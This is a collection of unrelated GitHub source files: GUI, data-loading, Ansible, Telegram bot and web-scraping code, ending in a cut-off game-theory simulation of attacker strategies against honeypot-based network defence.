We will call you soon\"\r\n    tmsg.showinfo(\"Experience\", msg)\r\n\r\ndef project():\r\n    ans = tmsg.askretrycancel(\"Do you like this project?\", \"Sorry if you don't like it\")\r\n    if ans:\r\n        print(\"Nothing will happen even if you retry\")\r\n\r\n    else:\r\n        print(\"thank you\")\r\n\r\n# mymenu=Menu(py_root)\r\n# mymenu.add_command(label=\"File\",command=func)\r\n# mymenu.add_command(label=\"Exit\",command=quit)\r\n# py_root.config(menu=mymenu)\r\n\r\nmainmenu=Menu(py_root)\r\n\r\nm1=Menu(mainmenu,tearoff=0)\r\nm1.add_command(label=\"New\",command=func)\r\nm1.add_command(label=\"save\",command=func)\r\nm1.add_separator()\r\nm1.add_command(label=\"save as\",command=func)\r\nm1.add_command(label=\"project\",command=func)\r\npy_root.config(menu=mainmenu)\r\nmainmenu.add_cascade(label=\"File\",menu=m1)\r\n\r\nm2=Menu(mainmenu,tearoff=0)\r\nm2.add_command(label=\"New\",command=func)\r\nm2.add_command(label=\"save\",command=func)\r\nm2.add_separator()\r\nm2.add_command(label=\"save as\",command=func)\r\nm2.add_command(label=\"project\",command=func)\r\npy_root.config(menu=mainmenu)\r\nmainmenu.add_cascade(label=\"Edit\",menu=m2)\r\n\r\nm3=Menu(mainmenu,tearoff=0)\r\nm3.add_command(label=\"New\",command=func)\r\nm3.add_command(label=\"save\",command=func)\r\nm3.add_separator()\r\nm3.add_command(label=\"save as\",command=func)\r\nm3.add_command(label=\"project\",command=func)\r\npy_root.config(menu=mainmenu)\r\nmainmenu.add_cascade(label=\"View\",menu=m3)\r\n\r\nm4=Menu(mainmenu,tearoff=0)\r\nm4.add_command(label=\"Help\",command=help)\r\nm4.add_command(label=\"feedback\",command=feedback)\r\nm4.add_command(label=\"project\",command=project)\r\npy_root.config(menu=mainmenu)\r\nmainmenu.add_cascade(label=\"Help\",menu=m4)\r\n\r\n\r\npy_root.mainloop()","repo_name":"Neer19/GUI-using-Tkinter","sub_path":"messagebox.py","file_name":"messagebox.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26954164467","text":"import torch\nimport torch.utils.data\nimport os\nimport numpy as np\nimport json\nimport pandas as pd\nfrom torch.utils.data import DataLoader\n\ndef get_data(filepath):\n    dataset = pd.read_pickle(filepath)\n\n    unique_id = list(range(len(dataset['name'])))\n    dataset['unique_id'] = unique_id\n    \n    unique_id_col = 'unique_id'\n    audio_feat_col = 'audio'\n    label_col = 'label'\n\n    dataset[unique_id_col] = dataset[unique_id_col].to_numpy()\n    dataset[label_col] = dataset[label_col].to_numpy()\n\n    ids = list(dataset[unique_id_col])\n    total_len = len(ids)\n    np.random.shuffle(ids)\n\n    # set parameters for DataLoader -- num_workers = cores, drop_last = uneven batching\n    params = {'batch_size': 16,\n              'shuffle': True,\n              'num_workers': 0,\n              'drop_last': True\n              }\n\n    # create data generator\n    _len = [x.shape[1] for x in dataset['audio']]\n    _lab_len = [len(x) for x in dataset['label']]\n\n    padded_data = []\n    padded_label = []\n\n    for val in dataset['audio']:\n        if val.shape[1] < max(_len):\n            val = np.pad(val, ((0,0), (0, max(_len)-val.shape[1])))\n        padded_data.append(val)\n\n    for lab in dataset['label']:\n        if len(lab) < max(_lab_len):\n            lab = np.array(np.pad(lab, ((0, max(_lab_len)-len(lab)))))\n        padded_label.append(lab)\n\n\n    dataset['padded_audio'] = padded_data\n    dataset['padded_label'] = padded_label\n\n    labels = {}\n\n    for i in dataset[unique_id_col]:\n        labels[i] = dataset['padded_label'][i]\n\n    data_set = AudioDataset(data=dataset, labels=labels, 
list_IDs=ids, in_len=_len, targ_len=_lab_len)\n    data_generator = DataLoader(data_set, **params)\n    return max(_len), data_generator\n\nclass AudioDataset(torch.utils.data.Dataset):\n\n    def __init__(self, data, list_IDs: list, labels: dict, in_len, targ_len):\n        \"\"\"Create custom torch Dataset. \"\"\"\n\n        self.data = data\n        self.labels = labels\n        self.list_IDs = list_IDs\n        self.label_lengths = targ_len\n        self.input_lengths = in_len\n\n    def __len__(self):\n        return len(self.list_IDs)\n\n    def __getitem__(self, index):\n        # select sample\n        ID = self.list_IDs[index]\n        # list_IDs is shuffled, so index the length lists by the sample's\n        # original row id (unique_id is the row position), not by `index`\n        original_len = self.input_lengths[ID]\n        original_label_len = self.label_lengths[ID]\n\n        # Load data\n        X = self.data[self.data['unique_id'] == ID]['padded_audio'].values[0]\n        y = self.labels[ID]\n\n        # return the single sample's id rather than the whole id list\n        return original_len, original_label_len, ID, torch.from_numpy(X), torch.tensor(y)\n","repo_name":"cshaib/CTC_based_kws","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16998810676","text":"from __future__ import (absolute_import, division, print_function)\n\n__metaclass__ = type\n\nfrom ansible.errors import AnsibleError\nfrom ansible.plugins.action import ActionBase\nfrom ansible.utils.vars import merge_hash\n\nimport os\n\n\nclass ActionModule(ActionBase):\n    _VALID_ARGS = frozenset(['jid', 'job', 'alias'])\n\n    def run(self, tmp=None, task_vars=None):\n        results = super(ActionModule, self).run(tmp, task_vars)\n        del tmp  # tmp no longer has any effect\n\n        if \"alias\" not in self._task.args:\n            raise AnsibleError(\"job alias is required\")\n\n        alias = self._task.args[\"alias\"]\n        job = self._task.args.get(\"job\", \"\")\n        jid = self._task.args.get(\"jid\", \"\")\n\n        if not jid and not job:\n            raise AnsibleError(\"jid or job is required\")\n\n        if jid:\n            results_file = os.path.join(self.async_dir(), jid)\n        elif job:\n            if job not in task_vars['vars']:\n                raise AnsibleError(\"no job among facts\")\n            else:\n                job = task_vars['vars'][job]\n            if \"results_file\" not in job:\n                raise AnsibleError(\"job does not contain results file\")\n            results_file = job['results_file']\n\n        module_args = dict(\n            src=results_file,\n            dest=os.path.join(os.path.dirname(results_file), \"jid_\" + alias),\n            state=\"link\"\n        )\n        status = self._execute_module(module_name='ansible.legacy.file', task_vars=task_vars,\n                                      module_args=module_args)\n        results = merge_hash(results, status)\n        return results\n\n    def async_dir(self):\n        env_async_dir = [e for e in self._task.environment if\n                         \"ANSIBLE_ASYNC_DIR\" in e]\n        if len(env_async_dir) > 0:\n            # for backwards compatibility we need to get the dir from\n            # ANSIBLE_ASYNC_DIR that is defined in the environment. This is\n            # deprecated and will be removed in favour of shell options\n            async_dir = env_async_dir[0]['ANSIBLE_ASYNC_DIR']\n\n            msg = \"Setting the async dir from the environment keyword \" \\\n                  \"ANSIBLE_ASYNC_DIR is deprecated. 
Set the async_dir \" \\\n \"shell option instead\"\n self._display.deprecated(msg, \"2.12\", collection_name='ansible.builtin')\n else:\n # inject the async directory based on the shell option into the\n # module args\n async_dir = self.get_shell_option('async_dir', default=\"~/.ansible_async\")\n\n return async_dir","repo_name":"scylladb/scylla-ansible-roles","sub_path":"example-playbooks/async_extra/action_plugins/async_alias.py","file_name":"async_alias.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"53"} +{"seq_id":"41010737949","text":"import asyncio\nimport asyncpg\n\nfrom aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom data.config import ADMINS\nfrom loader import dp, db, bot\nfrom keyboards.inline.container import container_key,ClearButton\nfrom states.admin_state import admin\nfrom aiogram.dispatcher.filters import Text\n\n#add picture command\n@dp.message_handler(commands=\"add_pic\", user_id=ADMINS)\nasync def send_ad_to_all(message: types.Message ,state:FSMContext):\n try:\n await message.answer('Kategoryani tanlang',reply_markup=container_key)\n await admin.select_container.set()\n except:\n await message.answer(\"Bir daqiqa kuting\")\n await message.answer('Kategoryani tanlang',reply_markup=container_key)\n\n@dp.message_handler(state=admin.select_container)\nasync def not_allowed(msg:types.Message):\n await msg.reply('Kategoriyani tanlashingiz kerak yoki,\\nBekor qilishnni bosing!!',reply_markup=container_key)\n\n#cancel commands\n@dp.callback_query_handler(text='cancel_add',state='*')\nasync def cancel_state(call: types.CallbackQuery, state: FSMContext):\n \"\"\"\n Allow user to cancel any action\n \"\"\"\n try:\n current_state = await state.get_state()\n if current_state is None:\n return\n\n # Cancel state and inform user about it\n await state.finish()\n # And remove keyboard (just in case)\n await call.answer('Bekor qilindi')\n await call.message.delete()\n await call.message.answer(\"Rasim qo'shish uchun /add_pic komandasini qayta yozing!\")\n\n except Exception as e:\n print(e)\n\n#wipe data\n\n@dp.message_handler(commands=\"clear_data\", user_id=ADMINS)\nasync def clear(message: types.Message ,state:FSMContext):\n await message.answer(text=\"Qaysi kategoriya malumotlarini o'chiray ?\",reply_markup=container_key)\n await state.set_state(admin.ClearData)\n\n\n#seleect dell container\n@dp.callback_query_handler(text='container1',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container1'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container2',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container2'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container3',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container3'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container4',state=admin.ClearData)\nasync def 
add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container4'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container5',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container5'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container6',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container6'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container7',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container7'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container8',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container8'\n }\n )\n await state.set_state(admin.ConfirmClear)\n\n@dp.callback_query_handler(text='container9',state=admin.ClearData)\nasync def add_pic(call: types.CallbackQuery,state:FSMContext):\n await call.message.answer(\"Malumotlarni rostdanxam o'chiraymi ?\",reply_markup=ClearButton)\n await state.update_data(\n {\n \"action\":'container9'\n }\n )\n await state.set_state(admin.ConfirmClear)\n \n#cleared\n@dp.callback_query_handler(text='clear_confirm',state=admin.ConfirmClear,user_id=ADMINS)\nasync def clear(call:types.CallbackQuery,state:FSMContext):\n data=await state.get_data()\n try:\n try:\n if data.get('action')=='container1':\n await db.drop_capture1()\n if data.get('action')=='container2':\n await db.drop_capture2()\n if data.get('action')=='container3':\n await db.drop_capture3()\n if data.get('action')=='container4':\n await db.drop_capture4()\n if data.get('action')=='container5':\n await db.drop_capture5()\n if data.get('action')=='container6':\n await db.drop_capture6()\n if data.get('action')=='container7':\n await db.drop_capture7()\n if data.get('action')=='container8':\n await db.drop_capture8()\n if data.get('action')=='container9':\n await db.drop_capture9()\n await call.answer(\"🗑 Malumotlar tozalandi\")\n await call.message.delete()\n await state.reset_state()\n except asyncpg.exceptions.ConnectionDoesNotExistError:\n await call.message.answer(\"Ulanishda xatolik /clear_data ni qayta yuboring!!\")\n await asyncio.sleep(60)\n await state.reset_state()\n except asyncpg.exceptions.UndefinedTableError:\n await call.answer(\"Malumot topilmadi!!\")\n await call.message.delete()\n await state.reset_state()\n\n#cancell confirm\n@dp.callback_query_handler(text='cancel',state=admin.ConfirmClear,user_id=ADMINS)\nasync def clear(call:types.CallbackQuery,state:FSMContext):\n await call.answer('Bekor qilindi!!')\n await call.message.answer(\"Malumot uchun: /help \")\n await call.message.delete()\n await 
state.reset_state()\n","repo_name":"SanjarbekDev/SabinaMebel","sub_path":"handlers/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":7026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10870560386","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\nfrom fake_useragent import UserAgent\nfrom time import sleep\n\n# define the request headers\nHEADERS = {\n    'User-Agent': UserAgent().random,\n    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',\n    'Accept-Encoding': 'gzip,deflate,br',\n    'Cookie': '',\n    'Connection': 'keep-alive',\n    'Pragma': 'no-cache',\n    'Cache-Control': 'no-cache'\n}\n\n# create the csv file to write to\ncsvfile = open('qunar.csv', 'w', encoding='utf-8', newline='')\nwriter = csv.writer(csvfile)\n# write the header row\nwriter.writerow([\"Region\", \"Name\", \"Sight ID\", \"Type\", \"Level\", \"Popularity\", \"Address\", \"Features\", \"Coordinates\"])\n\n\n# function for downloading sight content\npageCount = 0\nMAX_PAGE_COUNT = 10  # add a cap on the maximum number of pages\n\n# download a page; if the status code is not 200, wait 10s and retry\ndef download_soup_waitting(url):\n    try:\n        # verify: pass in Charles's root certificate (exported from Keychain), used to capture https traffic\n        response = requests.get(url, headers=HEADERS, allow_redirects=False, timeout=5, verify='/Users/vinzhou/Documents/CharlesProxyCA.pem')\n        if response.status_code == 200:\n            html = response.content\n            html = html.decode(\"utf-8\")\n            soup = BeautifulSoup(html, \"html.parser\")\n            print(\"download finished: \"+url)\n            return soup\n        else:\n            sleep(10)\n            print(\"waiting to download: \"+url)\n            return download_soup_waitting(url)\n    except:\n        return \"\"\n\n\ndef get_types():\n    # categories of popular sights (the Chinese values are query parameters expected by the site, so they stay as-is)\n    types = [\"文化古迹\", \"自然风光\", \"公园\", \"古建筑\", \"寺庙\", \"遗迹\", \"古镇\", \"陵墓陵园\", \"故居\", \"宗教\"]\n    for type in types:\n        global pageCount\n        pageCount = 0\n        # build the request url; %E7%83%AD%E9%97%A8%E6%99%AF%E7%82%B9 is the url encoding of the keyword 热门景点 (popular sights)\n        url = \"https://piao.qunar.com/ticket/list.htm?keyword=%E7%83%AD%E9%97%A8%E6%99%AF%E7%82%B9&from=mpl_search_suggest&subject=\" + type + \"&page=1\"\n        get_type(type, url)\n\n\ndef get_type(type, url):\n    soup = download_soup_waitting(url)\n    if soup == \"\":\n        print(\"soup is empty\")\n        return\n    search_list = soup.find('div', attrs={'id': 'search-list'})\n    sight_items = search_list.findAll('div', attrs={'class': 'sight_item'})\n    for sight_item in sight_items:\n        name = sight_item['data-sight-name']\n        districts = sight_item['data-districts']\n        point = sight_item['data-point']\n        address = sight_item['data-address']\n        data_id = sight_item['data-id']\n        level = sight_item.find('span', attrs={'class': 'level'})  # 5A\n        if level:\n            level = level.text\n        else:\n            level = \"\"\n        product_star_level = sight_item.find('span', attrs={'class': 'product_star_level'})\n        if product_star_level:\n            product_star_level = product_star_level.text\n        else:\n            product_star_level = \"\"\n        intro = sight_item.find('div', attrs={'class': 'intro'})\n        if intro:\n            intro = intro['title']\n        else:\n            intro = \"\"\n        writer.writerow(\n            [districts.replace(\"\\n\", \"\"), name.replace(\"\\n\", \"\"), data_id.replace(\"\\n\", \"\"), type.replace(\"\\n\", \"\"),\n             level.replace(\"\\n\", \"\"), product_star_level.replace(\"\\n\", \"\"), address.replace(\"\\n\", \"\"),\n             intro.replace(\"\\n\", \"\"), point.replace(\"\\n\", \"\")])\n    # find the next-page button\n    next = soup.find('a', attrs={'class': 'next'})\n    global pageCount\n    if next and pageCount < MAX_PAGE_COUNT:\n        pageCount += 1\n        next_url = \"http://piao.qunar.com\" + next['href']\n        get_type(type, next_url)\n\n\nif __name__ == '__main__':\r\n    
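# entry point: crawl every preset category and append the rows to qunar.csv\n    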
get_types()\n","repo_name":"vin-zhou/CrawlerPlay","sub_path":"GraspData.py","file_name":"GraspData.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29550361544","text":"import sys\nsys.path.append('./')\nfrom base import *\n\n# df must include 'amount' column\ndef create_frequency_table(df, column):\n df['quantile'] = pd.qcut(df[column],q=10,precision=0)\n df['quantile_no'] = pd.qcut(df[column],q=10,labels=False,precision=0)\n frequency = pd.crosstab(index=df['amount'], columns=df['quantile']) \n return frequency\n\n\ndef create_relative_frequency_table(df):\n ndf = df.copy()\n ndf.columns = [0,1,2,3,4,5,6,7,8,9]\n ndf['0rf'] = ndf.apply(lambda row: row[0]/(ndf[0].sum()), axis = 1) \n ndf['1rf'] = ndf.apply(lambda row: row[1]/(ndf[1].sum()), axis = 1) \n ndf['2rf'] = ndf.apply(lambda row: row[2]/(ndf[2].sum()), axis = 1) \n ndf['3rf'] = ndf.apply(lambda row: row[3]/(ndf[3].sum()), axis = 1) \n ndf['4rf'] = ndf.apply(lambda row: row[4]/(ndf[4].sum()), axis = 1) \n ndf['5rf'] = ndf.apply(lambda row: row[5]/(ndf[5].sum()), axis = 1) \n ndf['6rf'] = ndf.apply(lambda row: row[6]/(ndf[6].sum()), axis = 1) \n ndf['7rf'] = ndf.apply(lambda row: row[7]/(ndf[7].sum()), axis = 1) \n ndf['8rf'] = ndf.apply(lambda row: row[8]/(ndf[8].sum()), axis = 1) \n ndf['9rf'] = ndf.apply(lambda row: row[9]/(ndf[9].sum()), axis = 1) \n\n relFre = ndf[['0rf','1rf','2rf','3rf','4rf','5rf','6rf','7rf','8rf','9rf']].copy()\n\n return relFre\n\n\nCSVFilename = './measured-climate-data/measured-with-observed-only.csv' ### <<<<< Change this file when needed\ndata = pd.read_csv(CSVFilename, index_col=False)\ndf = data[['date','PET','amount']]\n\n# create frequency table\nfre = create_frequency_table(df, 'PET')\n# fre.to_csv('for-modeling/freqency.csv')\n\nrelFre = create_relative_frequency_table(fre)\n# relFre.to_csv('for-modeling/relative-freqency.csv')\n\ncum = relFre.cumsum()\ncum.columns = ['0','1','2','3','4','5','6','7','8','9']\ncum.to_csv('for-modeling/cumulative-freqency.csv')\n\n","repo_name":"monumentalconservation/climate-analysis","sub_path":"modelling-scripts/createFrequencyTable.py","file_name":"createFrequencyTable.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37426953174","text":"#!/usr/bin/env python\n\"\"\"\n Main training workflow\n\"\"\"\n\nimport configargparse\nimport os\nimport signal\n\nimport onmt.opts as opts\nfrom onmt.train_single import main as single_main\n\n\ndef main(opt):\n\n if opt.gpu: # case GPU\n single_main(opt, 0)\n else: # case only CPU\n single_main(opt, -1)\n\nclass ErrorHandler(object):\n \"\"\"A class that listens for exceptions in children processes and propagates\n the tracebacks to the parent process.\"\"\"\n\n def __init__(self, error_queue):\n \"\"\" init error handler \"\"\"\n import signal\n import threading\n self.error_queue = error_queue\n self.children_pids = []\n self.error_thread = threading.Thread(\n target=self.error_listener, daemon=True)\n self.error_thread.start()\n signal.signal(signal.SIGUSR1, self.signal_handler)\n\n def add_child(self, pid):\n \"\"\" error handler \"\"\"\n self.children_pids.append(pid)\n\n def error_listener(self):\n \"\"\" error listener \"\"\"\n (rank, original_trace) = self.error_queue.get()\n self.error_queue.put((rank, original_trace))\n os.kill(os.getpid(), signal.SIGUSR1)\n\n def signal_handler(self, signalnum, 
stackframe):\n \"\"\" signal handler \"\"\"\n for pid in self.children_pids:\n os.kill(pid, signal.SIGINT) # kill children processes\n (rank, original_trace) = self.error_queue.get()\n msg = \"\"\"\\n\\n-- Tracebacks above this line can probably be ignored --\\n\\n\"\"\"\n msg += original_trace\n raise Exception(msg)\n\n\nif __name__ == \"__main__\":\n parser = configargparse.ArgumentParser(\n description='train.py',\n config_file_parser_class=configargparse.YAMLConfigFileParser,\n formatter_class=configargparse.ArgumentDefaultsHelpFormatter)\n\n opts.config_opts(parser)\n opts.add_md_help_argument(parser)\n opts.model_opts(parser)\n opts.train_opts(parser)\n\n opt = parser.parse_args()\n main(opt)\n","repo_name":"Plutone11011/CoRec","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34841435414","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[34]:\n\n\nimport random\nimport numpy as np\nfrom main import display\nfrom defender_function import *\nimport numpy as np\nimport random\nimport math\nimport copy\nimport graph_function\n\n\n# In[ ]:\n\n\n\n\n\n# In[35]:\n\n\ndef att_strategy_option_matrix(CKC_number, strategy_number):\n strat_option = np.zeros((CKC_number, strategy_number))\n # R\n strat_option[0, 0] = 1\n # D\n strat_option[1, 0] = 1\n strat_option[1, 1] = 1\n # E\n strat_option[2, 1] = 1\n strat_option[2, 2] = 1\n strat_option[2, 3] = 1\n strat_option[2, 4] = 1\n strat_option[2, 6] = 1\n # C2\n for i in range(strategy_number - 1):\n strat_option[3, i] = 1\n # M\n for i in range(strategy_number - 1):\n strat_option[4, i] = 1\n # DE\n for i in range(strategy_number):\n strat_option[5, i] = 1\n \n return strat_option\n\n\n# In[36]:\n\n\ndef att_strategy_cost(strategy_number):\n# preset cost\n attack_cost = np.zeros(strategy_number)\n attack_cost[0] = 1\n attack_cost[1] = 3\n attack_cost[2] = 3\n attack_cost[3] = 3\n attack_cost[4] = 1\n attack_cost[5] = 3\n attack_cost[6] = 2\n attack_cost[7] = 3\n \n return attack_cost\n\n\n# In[37]:\n\n\ndef update_strategy_probability(opponent_strat_history):\n return_result = np.zeros((len(opponent_strat_history), len(opponent_strat_history[0])))\n sum_botton = np.sum(opponent_strat_history, axis=1)\n for k in range(len(opponent_strat_history)):\n for j in range(len(opponent_strat_history[0])):\n if sum_botton[k] == 0:\n return_result[k][j] = 1/len(opponent_strat_history[0])\n else:\n return_result[k][j] = opponent_strat_history[k][j]/sum_botton[k]\n \n return return_result\n \n \n\n\n# In[38]:\n\n\ndef attacker_uncertainty_update(att_in_system_time, att_detect, dec, uncertain_scheme, _lambda):\n # _lambda = 0.8 # was 2\n\n df = 1 + (1-att_detect) * dec\n uncertainty = 1 - math.exp((-_lambda) * (df)/att_in_system_time)\n \n# (scheme change here!) 
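\n    # Worked example (hypothetical numbers): with _lambda = 0.8,\n    # att_detect = 0.5, dec = 1 and att_in_system_time = 4 we get\n    # df = 1 + (1 - 0.5) * 1 = 1.5 and\n    # uncertainty = 1 - exp(-0.8 * 1.5 / 4) ~ 0.26,\n    # so uncertainty decays toward 0 the longer the attacker stays in.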
\n if uncertain_scheme:\n return uncertainty\n else:\n return 0\n\n\n# In[39]:\n\n\n# APV: value of an intermediate node i in an attack path\ndef calc_APV(G_att, G_real, node_ID, attack_cost, attack_detect_prob):\n \n if G_att.nodes[node_ID][\"compromised_status\"]:\n return 1\n \n att_detect_honey = False\n if G_real.nodes[node_ID][\"honeypot\"] == 1:\n if random.random() < attack_detect_prob:\n att_detect_honey = True\n elif G_real.nodes[node_ID][\"honeypot\"] == 2:\n if random.random() < (attack_detect_prob/2):\n att_detect_honey = True\n if att_detect_honey:\n# return (1 - (attack_cost/3) ) * G_real.nodes[node_ID][\"normalized_vulnerability\"]\n # if the node is honeypot, the APV for honeypot is 0.\n return 0\n else:\n return (1 - (attack_cost/3) ) * G_att.nodes[node_ID][\"normalized_vulnerability\"]\n\n \n\n\n# In[40]:\n\n\n# Attack Impact by given attack k\n# new_compromised_list is new compromised node IDs (do not include already compromised node)\ndef attack_impact(G, new_compromised_list):\n \n if len(new_compromised_list) == 0:\n return 0\n \n N = G.number_of_nodes()\n \n total_criticality = 0\n for n in new_compromised_list:\n total_criticality += G.nodes[n][\"criticality\"]\n ai = total_criticality/N\n return ai\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[41]:\n\n\n# AS1 – Monitoring attack\n# (keep try untile get one)\n# return: a dictionary contain all information\ndef attack_AS_1(G_real, G_att, G_def, node_info_list, monit_time):\n\n attack_cost = 1\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n \n node_id_set = list(G_att.nodes())\n\n # if all node evicted, do nothing\n# if all(list(nx.get_node_attributes(G_real, \"evicted_mark\").values())):\n# print(\"AS_1 Fail\")\n# return attack_result\n \n\n not_get_one = True\n while not_get_one:\n random_id = random.choice(node_id_set)\n # Check if compromised\n if not G_real.nodes[random_id][\"evicted_mark\"]:\n not_get_one = False\n if random.random() <= G_real.nodes[random_id][\n \"normalized_vulnerability\"] * math.exp(-1/monit_time): # success rate is based on real graph\n node_info_list.append(G_att.nodes[random_id][\"id\"])\n# not_get_one = False\n \n return attack_result\n\n\n# In[1]:\n\n\n# AS2 – Social engineering\n# input: node_info_list: nodes with information collected (dictionary type)\n#\n# return: a dictionary with \"attack cost\", and compromised \"ids\". 
\"ids\" is empty if unsuccessful\n\n# TODO: check all attack strategy, if correct vulnerability type is used\ndef attack_AS_2(node_info_list, G_real, G_att, G_def, P_fake,\n attack_detect_prob, location):\n \n attack_cost = 3\n\n attack_result = {\"attack_cost\": attack_cost, \"ids\": []}\n\n # fake key probability\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n # if outside\n if location is None:\n if node_info_list:\n target_node_id = random.choice(node_info_list)\n if random.random(\n ) < G_real.nodes[target_node_id][\"normalized_vulnerability\"]:\n attack_result[\"ids\"].append(target_node_id)\n G_real.nodes[target_node_id][\"compromised_status\"] = True\n G_att.nodes[target_node_id][\"compromised_status\"] = True\n# G_def.nodes[target_node_id][\"compromised_status\"] = True\n return attack_result\n\n # if inside\n max_APV_id = None\n max_APV = 0\n att_neighbors = [n for n in G_att[location]]\n\n # decide which node to compromise\n for node_id in att_neighbors:\n if G_real.has_node(node_id):\n if calc_APV(G_att, G_real, G_att.nodes[node_id][\"id\"], attack_cost,\n attack_detect_prob) >= max_APV: # choose node with APV\n max_APV = calc_APV(G_att, G_real, G_att.nodes[node_id][\"id\"],\n attack_cost, attack_detect_prob)\n max_APV_id = G_att.nodes[node_id][\"id\"]\n\n if max_APV_id is None:\n if display:\n print(\"no legitimate node in collection list \\U0001F630\")\n return attack_result\n\n # collusive attack\n if G_att.nodes[max_APV_id][\"compromised_status\"] and G_real.nodes[\n max_APV_id][\"compromised_status\"]:\n attack_result[\"ids\"].append(max_APV_id)\n if display: print(\"AS2: collusive attack\")\n return attack_result\n\n # compromise attempt\n if random.random() < G_real.nodes[max_APV_id][\"normalized_vulnerability\"]:\n attack_result[\"ids\"].append(max_APV_id)\n # set it compromised\n G_real.nodes[max_APV_id][\"compromised_status\"] = True\n G_att.nodes[max_APV_id][\"compromised_status\"] = True\n# G_def.nodes[max_APV_id][\"compromised_status\"] = True\n else:\n if display:\n print(\"AS2: unsuccessful on\", max_APV_id, \"with vul\",\n G_real.nodes[max_APV_id][\"normalized_vulnerability\"])\n\n return attack_result\n\n\n# In[43]:\n\n\n# AS3 – Botnet-based attack\n# (a legitimate node with more than one compromised node will be tried more than one times)\n# return: attack_result[\"ids\"] is new compromised ids\n\n\ndef attack_AS_3(collection_list, G_real, G_att, G_def, P_fake,\n attack_detect_prob):\n\n attack_result = {\"attack_cost\": 3, \"ids\": []}\n\n if random.random() <= P_fake:\n if display:\n print(\"get fake key, failed to compromise\")\n return attack_result\n\n\n# compromised_nodes = []\n# for n in G_att.nodes():\n# if G_real.nodes[n][\"compromised_status\"]:\n# compromised_nodes.append(n)\n attacked_adjacent = []\n\n # all_nodes = list(G_real.nodes())\n for node_id in collection_list:\n if not G_real.nodes[node_id][\"evicted_mark\"]:\n # if attacker detect deception, use real network\n if random.random() < attack_detect_prob:\n attacked_adjacent += graph_function.adjacent_node(G_real, node_id)\n else:\n attacked_adjacent += graph_function.adjacent_node(G_att, node_id)\n\n attacked_adjacent = list(set(attacked_adjacent))\n\n for n in attacked_adjacent:\n if G_att.nodes[n][\"compromised_status\"] and G_real.nodes[n][\n \"compromised_status\"]:\n # collusive attack\n attack_result[\"ids\"].append(n)\n else:\n if random.random() <= G_real.nodes[n][\"normalized_vulnerability\"]:\n 
